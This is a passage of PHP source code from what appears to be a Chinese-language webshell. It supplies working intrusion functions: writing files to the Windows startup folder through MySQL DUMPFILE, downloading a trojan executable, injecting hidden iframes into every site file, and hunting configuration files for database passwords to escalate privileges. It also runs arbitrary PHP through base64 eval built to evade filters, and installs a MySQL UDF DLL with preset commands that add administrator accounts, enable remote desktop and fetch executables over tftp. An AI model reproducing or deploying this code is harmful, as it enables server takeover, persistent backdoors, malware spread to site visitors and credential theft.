2526<a href=\"?eanver=sqlshell&o=d\">[MYSQL下载文件]</a></div>
2527<div class=\"actall\">
2528地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
2529端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
2530用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
2531密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
2532库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
2533</div>
2534<div class=\"actall\" style=\"height:220px;\">");
2535 if ($o == 'u') {
2536 $uppath = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs";
2537 if (!empty($_POST['uppath'])) {
2538 $uppath = $_POST['uppath'];
2539 $query = "Create TABLE a (cmd text NOT NULL);";
2540 if (@mysql_query($query, $conn)) {
2541 if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
2542 $filecode = bin2hex(File_Read($tmpcode));
2543 } else {
2544 $tmp = File_Str(dirname(myaddress)) . "/upfile.tmp";
2545 if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
2546 $filecode = bin2hex(File_Read($tmp));
2547 @unlink($tmp);
2548 }
2549 }
2550 $query = "Insert INTO a (cmd) VALUES(CONVERT(0x" . $filecode . ",CHAR));";
2551 if (@mysql_query($query, $conn)) {
2552 $query = "SELECT cmd FROM a INTO DUMPFILE '" . $uppath . "';";
2553 $MSG_BOX = @mysql_query($query, $conn) ? "上传文件成功" : "上传文件失败";
2554 } else {
2555 $MSG_BOX = "插入临时表失败";
2556 }
2557 @mysql_query("Drop TABLE IF EXISTS a;", $conn);
2558 } else {
2559 $MSG_BOX = "创建临时表失败";
2560 }
2561 }
2562 html_n("<br><br>上传路径 <input type=\"text\" name=\"uppath\" value=\"" . $uppath . "\" style=\"width:500px\">
2563<br><br>选择文件 <input type=\"file\" name=\"upfile\" style=\"width:500px;height:22px;\">
2564</div><div class=\"actall\"><input type=\"submit\" value=\"上传\" style=\"width:80px;\">");
2565 } elseif ($o == 'd') {
2566 html_n("<br><br><br>下载文件 <input type=\"text\" name=\"downfile\" value=\"" . $downfile . "\" style=\"width:500px\">
2567</div><div class=\"actall\"><input type=\"submit\" value=\"下载\" style=\"width:80px;\">");
2568 } else {
2569 if (!empty($_POST['msql'])) {
2570 $msql = $_POST['msql'];
2571 $msql = base64_decode($msql);
2572 if ($result = @mysql_query($msql, $conn)) {
2573 $MSG_BOX = "执行SQL语句成功<br>";
2574 $k = 0;
2575 while ($row = @mysql_fetch_array($result)) {
2576 $MSG_BOX .= $row[$k];
2577 $k++;
2578 }
2579 } else {
2580 $MSG_BOX .= ":" . @mysql_error();
2581 }
2582 }
2583 html_n("<textarea name=\"msql\" id=\"msql\" style=\"width:700px;height:200px;\">" . $msql . "</textarea></div>
2584<div class=\"actall\">
2585<select onchange=\"return nFull(options[selectedIndex].value)\">
2586 <option value=\"0\" selected>显示版本</option>
2587 <option value=\"1\">导出文件</option>
2588 <option value=\"2\">写入文件</option>
2589 <option value=\"3\">开启外连</option>
2590</select>
2591<input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">");
2592 }
2593 if ($MSG_BOX != '') {
2594 echo "</div><div class=\"actall\">" . $MSG_BOX . "</div></center></form>";
2595 } else {
2596 echo "</div></center></form>";
2597 }
2598 break;
2599 case "downloader":
2600 $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : "http://" . getenv('REMOTE_ADDR') . "/down/muma.exe";
2601 $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . "/muma.exe");
2602 html_n("<form method=\"POST\">
2603 <div class=\"actall\">超连接 <input name=\"durl\" value=\"" . $Com_durl . "\" type=\"text\" style=\"width:600px;\"></div>
2604 <div class=\"actall\">下载到 <input name=\"dpath\" value=\"" . $Com_dpath . "\" type=\"text\" style=\"width:600px;\"></div>
2605 <div class=\"actall\"><input value=\"下载\" type=\"submit\" style=\"width:80px;\"></div></form>");
2606 if ((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) {
2607 echo "<div class=\"actall\">";
2608 $contents = @implode('', @file($_POST['durl']));
2609 if (!$contents) {
2610 echo "无法读取要下载的数据";
2611 } else {
2612 echo File_Write($_POST['dpath'], $contents, 'wb') ? "下载文件成功" : "下载文件失败";
2613 }
2614 echo "</div>";
2615 }
2616 break;
2617 case "upfiles":
2618 html_n("<tr><td>服务器限制上传单个文件大小: " . @get_cfg_var('upload_max_filesize') . "<form method=\"POST\" enctype=\"multipart/form-data\">");
2619 html_input("text", "uppath", root_dir, "<br>上传到路径: ", "51");
2620 html_n("<SCRIPT language=\"JavaScript\">
2621function addTank(){
2622var k=0;
2623 k=k+1;
2624 k=tank.rows.length;
2625 newRow=document.all.tank.insertRow(-1)
2626 newcell=newRow.insertCell()
2627 newcell.innerHTML=\"<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>\"
2628}
2629
2630function delTank() {
2631 if(tank.rows.length==1) return;
2632 var checkit = false;
2633 for (var i=0;i<document.all.tankNo.length;i++) {
2634 if (document.all.tankNo[i].checked) {
2635 checkit=true;
2636 tank.deleteRow(i+1);
2637 i--;
2638 }
2639 }
2640 if (checkit) {
2641 } else{
2642 alert(\"请选择一个要删除的对象\");
2643 return false;
2644 }
2645}
2646</SCRIPT>
2647<br><br>
2648<table cellSpacing=0 cellPadding=0 width=\"100%\" border=0>
2649 <tr>
2650 <td width=\"7%\"><input class=\"button01\" type=\"button\" onclick=\"addTank()\" value=\" 添 加 \" name=\"button2\"/>
2651 <input name=\"button3\" type=\"button\" class=\"button01\" onClick=\"delTank()\" value=\"删除\" />
2652 </td>
2653 </tr>
2654</table>
2655<table id=\"tank\" width=\"100%\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\" >
2656<tr><td>请选择要上传的文件:</td></tr>
2657<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr>
2658</table>");
2659 html_n("<br><input type=\"submit\" name=\"upfiles\" value=\"上传\" style=\"width:80px;\"> <input type=\"button\" value=\"返回\" onclick=\"window.location='?eanver=main&path=" . root_dir . "';\" style=\"width:80px;\">");
2660 if (isset($_POST['upfiles'])) {
2661 foreach ($_FILES["upfile"]["error"] as $key => $error) {
2662 if ($error == UPLOAD_ERR_OK) {
2663 $tmp_name = $_FILES["upfile"]["tmp_name"][$key];
2664 $name = $_FILES["upfile"]["name"][$key];
2665 $uploadfile = str_path($_POST['uppath'] . '/' . $name);
2666 $upload = @copy($tmp_name, $uploadfile) ? $name . $msg[2] : @move_uploaded_file($tmp_name, $uploadfile) ? $name . $msg[2] : $name . $msg[3];
2667 echo "<br><br>" . $upload;
2668 }
2669 }
2670 }
2671 html_n("</form>");
2672 break;
2673 case "guama":
2674 $patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
2675 $typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
2676 $codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>";
2677 html_n("<tr><td>文件类型请用\"|\"隔开,也可以是指定文件名.<form method=\"POST\"><br>");
2678 html_input("text", "path", $patht, "路径范围", "45");
2679 html_input("checkbox", "pass", "", "使用目录遍历", "", true);
2680 html_input("text", "type", $typet, "<br><br>文件类型", "60");
2681 html_text("code", "67", "5", $codet);
2682 html_n("<br><br>");
2683 html_radio("批量挂马", "批量清马", "guama", "qingma");
2684 html_input("submit", "passreturn", "开始");
2685 html_n("</td></tr></form>");
2686 if (!empty($_POST['path'])) {
2687 html_n("<tr><td>目标文件:<br><br>");
2688 if (isset($_POST['pass'])) {
2689 $bool = true;
2690 } else {
2691 $bool = false;
2692 }
2693 do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
2694 }
2695 break;
2696 case "tihuan":
2697 $newcode = isset($_POST['newcode']) ? $_POST['newcode'] : "";
2698 $oldcode = isset($_POST['oldcode']) ? $_POST['oldcode'] : "";
2699 html_n("<tr><td>此功能可批量替换文件内容,请小心使用.<br><br><form method=\"POST\">");
2700 html_input("text", "path", root_dir, "路径范围", "45");
2701 html_input("checkbox", "pass", "", "使用目录遍历", "", true);
2702 html_text("newcode", "67", "5", $newcode);
2703 html_n("<br><br>替换为");
2704 html_text("oldcode", "67", "5", $oldcode);
2705 html_input("submit", "passreturn", "替换", "<br><br>");
2706 html_n("</td></tr></form>");
2707 if (!empty($_POST['path'])) {
2708 html_n("<tr><td>目标文件:<br><br>");
2709 if (isset($_POST['pass'])) {
2710 $bool = true;
2711 } else {
2712 $bool = false;
2713 }
2714 do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
2715 }
2716 break;
2717 case "scanfile":
2718 $code = isset($_POST['code']) ? $_POST['code'] : "";
2719 css_js("4");
2720 html_n("<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method=\"POST\" name=\"sform\"><br>");
2721 html_input("text", "path", root_dir, "路径名", "45");
2722 html_input("checkbox", "pass", "", "使用目录遍历", "", true);
2723 html_input("text", "code", $code, "<br><br>关键字", "40");
2724 html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog", "dedecms", "phpcms"), 0, "onchange='return Fulll(options[selectedIndex].value)'");
2725 html_n("<br><br>");
2726 html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode");
2727 html_input("submit", "passreturn", "搜索");
2728 html_n("</td></tr></form>");
2729 if (!empty($_POST['path'])) {
2730 html_n("<tr><td>找到文件:<br><br>");
2731 if (isset($_POST['pass'])) {
2732 $bool = true;
2733 } else {
2734 $bool = false;
2735 }
2736 do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
2737 }
2738 break;
2739 case "scanphp":
2740 html_n("<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method=\"POST\"><br>");
2741 html_input("text", "path", root_dir, "查找范围", "40");
2742 html_input("checkbox", "pass", "", "使用目录遍历<br><br>脚本类型", "", true);
2743 html_select(array("php" => "PHP", "asp" => "ASP", "aspx" => "ASPX", "jsp" => "JSP"));
2744 html_input("submit", "passreturn", "查找", "<br><br>");
2745 html_n("</td></tr></form>");
2746 if (!empty($_POST['path'])) {
2747 html_n("<tr><td>找到文件:<br><br>");
2748 if (isset($_POST['pass'])) {
2749 $bool = true;
2750 } else {
2751 $bool = false;
2752 }
2753 do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
2754 }
2755 break;
2756 case "port":
2757 $Port_ip = isset($_POST['ip']) ? $_POST['ip'] : "127.0.0.1";
2758 $Port_port = isset($_POST['port']) ? $_POST['port'] : "21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873";
2759 html_n("<form method=\"POST\">
2760<div class=\"actall\">扫描IP <input type=\"text\" name=\"ip\" value=\"" . $Port_ip . "\" style=\"width:600px;\"> </div>
2761<div class=\"actall\">端口号 <input type=\"text\" name=\"port\" value=\"" . $Port_port . "\" style=\"width:597px;\"></div>
2762<div class=\"actall\"><input type=\"submit\" value=\"扫描\" style=\"width:80px;\"></div>
2763</form>");
2764 if ((!empty($_POST['ip'])) && (!empty($_POST['port']))) {
2765 echo "<div class=\"actall\">";
2766 $ports = explode('|', $_POST['port']);
2767 for ($i = 0; $i < count($ports); $i++) {
2768 $fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
2769 echo $fp ? "<font color=\"#00ff00\">开放端口: " . $ports[$i] . "</font><br>" : "关闭端口: " . $ports[$i] . "<br>";
2770 ob_flush();
2771 flush();
2772 }
2773 echo "</div>";
2774 }
2775 break;
2776 case "getcode":
2777 if (isset($_POST['url'])) {
2778 $proxycontents = @implode('', @file($_POST['url']));
2779 $proxycontents2 = $proxycontents;
2780 $proxycontents = @TestUtf8($proxycontents) ? @iconv("utf-8", "utf8//IGNORE", $proxycontents) : $proxycontents;
2781 if (empty($proxycontents)) {
2782 $proxycontents = $proxycontents2;
2783 }
2784 echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";
2785 exit;
2786 }
2787 html_n("<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" bgcolor=\"#ffffff\">
2788 <form method=\"POST\" target=\"proxyframe\">
2789 <tr class=\"firstalt\">
2790 <td align=\"center\"><b>在线代理</b></td>
2791 </tr>
2792 <tr class=\"secondalt\">
2793 <td align=\"center\" ><br><ul><li>用本功能仅实现简单的 HTTP 代理,不会显示使用相对路径的图片、链接及CSS样式表.</li><li>用本功能可以通过本服务器浏览目标URL,但不支持 SQL Injection 探测以及某些特殊字符.</li><li>用本功能浏览的 URL,在目标主机上留下的IP记录是 : " . $_SERVER['SERVER_NAME'] . "</li></ul></td>
2794 </tr>
2795 <tr class=\"firstalt\">
2796 <td align=\"center\" height=40 >URL: <input name=\"url\" value=\"\" type=\"text\" class=\"input\" size=\"100\" >
2797 <input name=\"\" value=\"浏览\" type=\"submit\" class=\"input\" size=\"30\" >
2798</td>
2799 </tr>
2800 <tr class=\"secondalt\">
2801 <td align=\"center\" ><iframe name=\"proxyframe\" frameborder=\"0\" width=\"765\" height=\"400\" marginheight=\"0\" marginwidth=\"0\" scrolling=\"auto\" src=\"about:blank\"></iframe></td>
2802 </tr>
2803</form></table>");
2804 break;
2805 case "phpcode":
2806 $phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
2807 if ($phpcode != "phpinfo();") {
2808 $phpcode = htmlspecialchars(base64_decode($phpcode));
2809 }
2810 echo "<script language=\"javascript\">";
2811 html_base();
2812 echo "function SubmitUrl(){
2813 document.getElementById('phpcode').value = base64encode(document.getElementById('phpcode').value);
2814 document.getElementById('sendcode').submit();
2815 }</script><tr><td><form method=\"POST\" id=\"sendcode\" >不用写<? ?>标签,此功能优化使用BASE64加密传送,防止恶意代码被拦,用了就知道<br><br><textarea COLS=\"120\" ROWS=\"35\" name=\"phpcode\" id=\"phpcode\">" . $phpcode . "</textarea><br><br><input type=\"button\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:80px;\">";
2816 if (!empty($_POST['phpcode'])) {
2817 echo "<br><br>";
2818 eval(stripslashes(base64_decode($_POST['phpcode'])));
2819 }
2820 html_n("</form>");
2821 break;
2822 case "myexp":
2823 $MSG_BOX = "请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.";
2824 $info = "命令回显";
2825 $mhost = 'localhost';
2826 $muser = 'root';
2827 $mport = '3306';
2828 $mpass = '';
2829 $mdata = 'mysql';
2830 $mpath = "C:/windows/mysqlDll.dll";
2831 $sqlcmd = 'ver';
2832 if (isset($_POST['mhost']) && isset($_POST['muser'])) {
2833 $mhost = $_POST['mhost'];
2834 $muser = $_POST['muser'];
2835 $mpass = $_POST['mpass'];
2836 $mdata = $_POST['mdata'];
2837 $mport = $_POST['mport'];
2838 $mpath = File_Str($_POST['mpath']);
2839 $sqlcmd = $_POST['sqlcmd'];
2840 $conn = @mysql_connect($mhost . ':' . $mport, $muser, $mpass);
2841 if ($conn) {
2842 @mysql_select_db($mdata);
2843 if ((!empty($_POST['outdll'])) && (!empty($_POST['mpath']))) {
2844 $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
2845 if (@mysql_query($query, $conn)) {
2846 $shellcode = Mysql_shellcode();
2847 $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
2848 if (@mysql_query($query, $conn)) {
2849 $query = "SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE '" . $mpath . "';";
2850 if (@mysql_query($query, $conn)) {
2851 $ap = explode('/', $mpath);
2852 $inpath = array_pop($ap);
2853 $query = "Create Function state returns string soname '" . $inpath . "';";
2854 $MSG_BOX = @mysql_query($query, $conn) ? "安装DLL成功" : "安装DLL失败";
2855 } else {
2856 $MSG_BOX = "导出DLL文件失败";
2857 }
2858 } else {
2859 $MSG_BOX = "写入临时表失败";
2860 }
2861 @mysql_query("DROP TABLE Envl_Temp_Tab;", $conn);
2862 } else {
2863 $MSG_BOX = "创建临时表失败";
2864 }
2865 }
2866 if (!empty($_POST['runcmd'])) {
2867 $query = "select state(\"" . $sqlcmd . "\");";
2868 $result = @mysql_query($query, $conn);
2869 if ($result) {
2870 $k = 0;
2871 $info = null;
2872 while ($row = @mysql_fetch_array($result)) {
2873 $infotmp .= $row[$k];
2874 $k++;
2875 }
2876 $info = $infotmp;
2877 $MSG_BOX = "执行成功";
2878 } else {
2879 $MSG_BOX = "执行失败";
2880 }
2881 }
2882 } else {
2883 $MSG_BOX = "连接MYSQL失败";
2884 }
2885 }
2886 html_n("<script language=\"javascript\">
2887function Fullm(i){
2888 Str = new Array(11);
2889 Str[0] = \"ver\";
2890 Str[1] = \"net user envl envl /add\";
2891 Str[2] = \"net localgroup administrators envl /add\";
2892 Str[3] = \"net start Terminal Services\";
2893 Str[4] = \"tasklist /svc\";
2894 Str[5] = \"netstat -ano\";
2895 Str[6] = \"ipconfig\";
2896 Str[7] = \"net user guest /active:yes\";
2897 Str[8] = \"copy c:/1.php d:/2.php\";
2898 Str[9] = \"tftp -i 127.0.0.1 get server.exe c:/server.exe\";
2899 Str[10] = \"net start telnet\";
2900 Str[11] = \"shutdown -r -t 0\";
2901 mform.sqlcmd.value = Str[i];
2902 return true;
2903}
2904</script>
2905<form id=\"mform\" method=\"POST\">
2906<div id=\"msgbox\" class=\"msgbox\">" . $MSG_BOX . "</div>
2907<center><div class=\"actall\">
2908地址 <input type=\"text\" name=\"mhost\" value=\"" . $mhost . "\" style=\"width:110px\">
2909端口 <input type=\"text\" name=\"mport\" value=\"" . $mport . "\" style=\"width:110px\">
2910用户 <input type=\"text\" name=\"muser\" value=\"" . $muser . "\" style=\"width:110px\">
2911密码 <input type=\"text\" name=\"mpass\" value=\"" . $mpass . "\" style=\"width:110px\">
2912库名 <input type=\"text\" name=\"mdata\" value=\"" . $mdata . "\" style=\"width:110px\">
2913</div><div class=\"actall\">
2914可加载路径 <input type=\"text\" name=\"mpath\" value=\"" . $mpath . "\" style=\"width:555px\">
2915<input type=\"submit\" name=\"outdll\" value=\"安装DLL\" style=\"width:80px;\"></div>
2916<div class=\"actall\">安装成功后可用 <br><input type=\"text\" name=\"sqlcmd\" value=\"" . $sqlcmd . "\" style=\"width:515px;\">
2917<select onchange=\"return Fullm(options[selectedIndex].value)\">
2918<option value=\"0\" selected>--命令集合--</option>
2919<option value=\"1\">添加管理员</option>
2920<option value=\"2\">设为管理组</option>
2921<option value=\"3\">开启远程桌面</option>
2922<option value=\"4\">查看进程和PID</option>
2923<option value=\"5\">查看端口和PID</option>
2924<option value=\"6\">查看IP</option>
2925<option value=\"7\">激活guest帐户</option>
2926<option value=\"8\">复制文件</option>
2927<option value=\"9\">ftp下载</option>
2928<option value=\"10\">开启telnet</option>
2929<option value=\"11\">重启</option>
2930</select>
2931<input type=\"submit\" name=\"runcmd\" value=\"执行\" style=\"width:80px;\">
2932<textarea style=\"width:720px;height:300px;\">" . $info . "</textarea>
2933</div></center>
2934</form>");
2935 break;
2936 case "mysql_exec":
2937 $cookie_name_mysql = $envlpath . "mysql";
2938 if (isset($_COOKIE[$cookie_name_mysql . "user"])) {
2939 die("<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
2940 }
2941 if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
2942 if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
2943 $cookietime = time() + 6 * 3600;
2944 setcookie($cookie_name_mysql . 'host', $_POST['mhost'], $cookietime);
2945 setcookie($cookie_name_mysql . 'port', $_POST['mport'], $cookietime);
2946 setcookie($cookie_name_mysql . 'user', $_POST['muser'], $cookietime);
2947 setcookie($cookie_name_mysql . 'pass', $_POST['mpass'], $cookietime);
2948 die("正在登陆,请稍候...<meta http-equiv=\"refresh\" content=\"0;URL=?eanver=mysql_msg\">");
2949 } else {
2950 echo "登陆失败";
2951 }
2952 }
2953 html_n("<form method=\"POST\" name=\"oform\" id=\"oform\">
2954<div class=\"actall\">地址 <input type=\"text\" name=\"mhost\" value=\"localhost\" style=\"width:300px\"></div>
2955<div class=\"actall\">端口 <input type=\"text\" name=\"mport\" value=\"3306\" style=\"width:300px\"></div>
2956<div class=\"actall\">用户 <input type=\"text\" name=\"muser\" value=\"root\" style=\"width:300px\"></div>
2957<div class=\"actall\">密码 <input type=\"text\" name=\"mpass\" value=\"\" style=\"width:300px\"></div>
2958<div class=\"actall\"><input type=\"submit\" value=\"登陆\" style=\"width:80px;\"></div>
2959</form>");
2960 break;
2961 case "mysql_msg":
2962 $cookie_name_mysql = $envlpath . "mysql";
2963 $conn = @mysql_connect($_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'], $_COOKIE[$cookie_name_mysql . 'user'], $_COOKIE[$cookie_name_mysql . 'pass']);
2964 if ($conn) {
2965 html_n("<script language=\"javascript\">
2966function Delok(msg,gourl)
2967{
2968 smsg = \"确定要删除[\" + unescape(msg) + \"]吗?\";
2969 if(confirm(smsg)){window.location = gourl;}
2970}
2971function Createok(ac)
2972{
2973 if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
2974 if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
2975 if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
2976 return false;
2977}");
2978 html_base();
2979 html_n("function SubmitUrl(){
2980 document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
2981 document.getElementById('gform').submit();
2982}
2983</script>");
2984 $BOOL = false;
2985 $MSG_BOX = "用户:" . $_COOKIE[$cookie_name_mysql . 'user'] . " 地址:" . $_COOKIE[$cookie_name_mysql . 'host'] . ':' . $_COOKIE[$cookie_name_mysql . 'port'] . " 版本:";
2986 $k = 0;
2987 $result = @mysql_query("select version();", $conn);
2988 while ($row = @mysql_fetch_array($result)) {
2989 $MSG_BOX .= $row[$k];
2990 $k++;
2991 }
2992 echo "<div class=\"actall\"> 数据库:";
2993 $result = @mysql_query("SHOW DATABASES", $conn);
2994 while ($db = @mysql_fetch_array($result)) {
2995 echo " [<a href=\"?eanver=mysql_msg&db=" . $db['Database'] . '">' . $db['Database'] . "</a>]";
2996 }
2997 echo "</div>";
2998 if (isset($_GET['db'])) {
2999 @mysql_select_db($_GET['db'], $conn);
3000 $textarea = "";
3001 $querya = "";
3002 $queryb = "";
3003 $queryc = "";
3004 if (isset($_POST['nsql'])) {
3005 $_POST['nsql'] = base64_decode($_POST['nsql']);
3006 $textarea = $_POST['nsql'];
3007 $BOOL = true;
3008 $MSG_BOX = @mysql_query($_POST['nsql'], $conn) ? "执行成功" : "执行失败 " . @mysql_error();
3009 }
3010 if (isset($_POST['insql']) && is_array($_POST['insql'])) {
3011 $query = "INSERT INTO " . $_GET['table'] . ' (';
3012 foreach ($_POST['insql'] as $var => $key) {
3013 $querya .= $var . ',';
3014 $queryb .= '\'' . addslashes($key) . '\',';
3015 }
3016 $query = $query . substr($querya, 0, -1) . ') VALUES (' . substr($queryb, 0, -1) . ');';
3017 $MSG_BOX = @mysql_query($query, $conn) ? "添加成功" : "添加失败 " . @mysql_error();
3018 }
3019 if (isset($_POST['upsql']) && is_array($_POST['upsql'])) {
3020 $query = 'UPDATE ' . $_GET['table'] . ' SET ';
3021 foreach ($_POST['upsql'] as $var => $key) {
3022 $queryb .= $var . '=\'' . addslashes($key) . '\',';
3023 }
3024 $query = $query . substr($queryb, 0, -1) . ' ' . base64_decode($_POST['wherevar']) . ';';
3025 $MSG_BOX = @mysql_query($query, $conn) ? "修改成功" : "修改失败 " . @mysql_error();
3026 }
3027 if (isset($_GET['del'])) {
3028 $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['del'] . ', 1;', $conn);
3029 $good = @mysql_fetch_assoc($result);
3030 $query = "DELETE FROM " . $_GET['table'] . ' WHERE ';
3031 foreach ($good as $var => $key) {
3032 $queryc .= $var . '=\'' . addslashes($key) . '\' AND ';
3033 }
3034 $where = $query . substr($queryc, 0, -4) . ';';
3035 $MSG_BOX = @mysql_query($where, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
3036 }
3037 $action = "?eanver=mysql_msg&db=" . $_GET['db'];
3038 if (isset($_GET['drop'])) {
3039 $query = "Drop TABLE IF EXISTS " . $_GET['drop'] . ';';
3040 $MSG_BOX = @mysql_query($query, $conn) ? "删除成功" : "删除失败 " . @mysql_error();
3041 }
3042 if (isset($_GET['table'])) {
3043 $action .= '&table=' . $_GET['table'];
3044 if (isset($_GET['edit'])) {
3045 $action .= '&edit=' . $_GET['edit'];
3046 }
3047 }
3048 if (isset($_GET['insert'])) {
3049 $action .= '&insert=' . $_GET['insert'];
3050 }
3051 echo "<div class=\"actall\"><form method=\"POST\" action=\"" . $action . "\" name=\"gform\" id=\"gform\">";
3052 echo "<textarea name=\"nsql\" id=\"nsql\" style=\"width:500px;height:50px;\">" . $textarea . "</textarea> ";
3053 echo "<input type=\"button\" name=\"querysql\" value=\"执行\" onclick=\"SubmitUrl();\" style=\"width:60px;height:49px;\"> <input type=\"button\" value=\"创建表\" style=\"width:60px;height:49px;\" onclick=\"Createok('a')\"> <input type=\"button\" value=\"创建库\" style=\"width:60px;height:49px;\" onclick=\"Createok('b')\"> <input type=\"button\" value=\"删除库\" style=\"width:60px;height:49px;\" onclick=\"Createok('c')\"></form></div><div class=\"msgbox\" style=\"height:40px;\">" . $MSG_BOX . "</div><div class=\"actall\"><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '">' . $_GET['db'] . "</a> ---> ";
3054 if (isset($_GET['table'])) {
3055 echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $_GET['table'] . '">' . $_GET['table'] . '</a> ';
3056 echo "[<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $_GET['table'] . "\">插入</a>]</div>";
3057 if (isset($_GET['edit'])) {
3058 if (isset($_GET['p'])) {
3059 $atable = $_GET['table'] . '&p=' . $_GET['p'];
3060 } else {
3061 $atable = $_GET['table'];
3062 }
3063 echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&table=' . $atable . '">';
3064 $result = @mysql_query("SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $_GET['edit'] . ', 1;', $conn);
3065 $good = @mysql_fetch_assoc($result);
3066 $u = 0;
3067 foreach ($good as $var => $key) {
3068 $queryc .= $var . '=\'' . $key . '\' AND ';
3069 $type = @mysql_field_type($result, $u);
3070 $len = @mysql_field_len($result, $u);
3071 echo "<div class=\"actall\">" . $var . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"upsql[" . $var . "]\" style=\"width:600px;height:60px;\">" . htmlspecialchars($key) . "</textarea></div>";
3072 $u++;
3073 }
3074 $where = 'WHERE ' . substr($queryc, 0, -4);
3075 echo "<input type=\"hidden\" id=\"wherevar\" name=\"wherevar\" value=\"" . base64_encode($where) . "\"><div class=\"actall\"><input type=\"submit\" value=\"Update\" style=\"width:80px;\"></div></form>";
3076 } else {
3077 $query = "SHOW COLUMNS FROM " . $_GET['table'];
3078 $result = @mysql_query($query, $conn);
3079 $fields = array();
3080
3081 $pagesize = 20;
3082 $row_num = @mysql_num_rows(@mysql_query("SELECT * FROM " . $_GET['table'], $conn));
3083 $numrows = $row_num;
3084 $pages = intval($numrows / $pagesize);
3085 if ($numrows % $pagesize) {
3086 $pages++;
3087 }
3088 if (!isset($_GET['p'])) {
3089 $p = 0;
3090 $_GET['p'] = 1;
3091 } else {
3092 $p2 = ((int)$_GET['p']);
3093 if ($p2 > $pages) {
3094 $p2 = $pages;
3095 } elseif ($p2 < 1) {
3096 $p2 = 1;
3097 }
3098 $p = ($p2 - 1) * 20;
3099 $_GET['p'] = $p2;
3100 }
3101 $page = $_GET['p'];
3102 $offset = $pagesize * ($page - 1);
3103
3104
3105 echo "<table border=\"0\"><tr>";
3106 echo "<td class=\"toptd\" style=\"width:70px;\" nowrap>操作</td>";
3107 while ($row = @mysql_fetch_assoc($result)) {
3108 array_push($fields, $row['Field']);
3109 echo "<td class=\"toptd\" nowrap>" . $row['Field'] . "</td>";
3110 }
3111 echo "</tr>";
3112 $nsql = isset($_POST['nsql']) ? $_POST['nsql'] : "";
3113 if (preg_match('/WHERE|LIMIT/', $nsql) && preg_match('/SELECT|FROM/', $nsql)) {
3114 $query = $nsql;
3115 } else {
3116 $query = "SELECT * FROM " . $_GET['table'] . ' LIMIT ' . $p . ', 20;';
3117 }
3118 $result = @mysql_query($query, $conn);
3119 $v = $p;
3120 while ($text = @mysql_fetch_assoc($result)) {
3121 echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&edit=' . $v . "\"> 修改 </a> <a href=\"#\" onclick=\"Delok('它','?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . '&p=' . $_GET['p'] . '&del=' . $v . "');return false;\"> 删除 </a></td>";
3122 foreach ($fields as $row) {
